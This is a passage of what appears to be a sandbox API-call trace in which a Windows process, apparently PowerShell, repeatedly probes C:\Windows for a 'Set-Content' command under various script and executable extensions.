dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.577] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.577] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.577] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.577] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.psd1" (normalized: "c:\\windows\\set-content.psd1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.577] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.577] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.578] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.578] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.COM" (normalized: "c:\\windows\\set-content.com"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.578] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.578] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.578] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.579] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.EXE" (normalized: "c:\\windows\\set-content.exe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.579] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.579] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.579] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.579] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.BAT" (normalized: "c:\\windows\\set-content.bat"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.580] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.580] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.580] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.580] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.CMD" (normalized: "c:\\windows\\set-content.cmd"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.580] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.580] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.581] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.581] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.VBS" (normalized: "c:\\windows\\set-content.vbs"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.582] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.582] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.582] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.582] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.VBE" (normalized: "c:\\windows\\set-content.vbe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.582] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.583] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.583] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.583] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.JS" (normalized: "c:\\windows\\set-content.js"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.583] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.583] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.583] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.584] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.JSE" (normalized: "c:\\windows\\set-content.jse"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.584] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.584] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.584] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.584] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.WSF" (normalized: "c:\\windows\\set-content.wsf"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.585] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.585] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.585] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.585] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.WSH" (normalized: "c:\\windows\\set-content.wsh"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.585] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.585] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.586] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.586] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.MSC" (normalized: "c:\\windows\\set-content.msc"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.586] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.586] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.586] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.586] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.CPL" (normalized: "c:\\windows\\set-content.cpl"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.587] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.587] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.587] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: 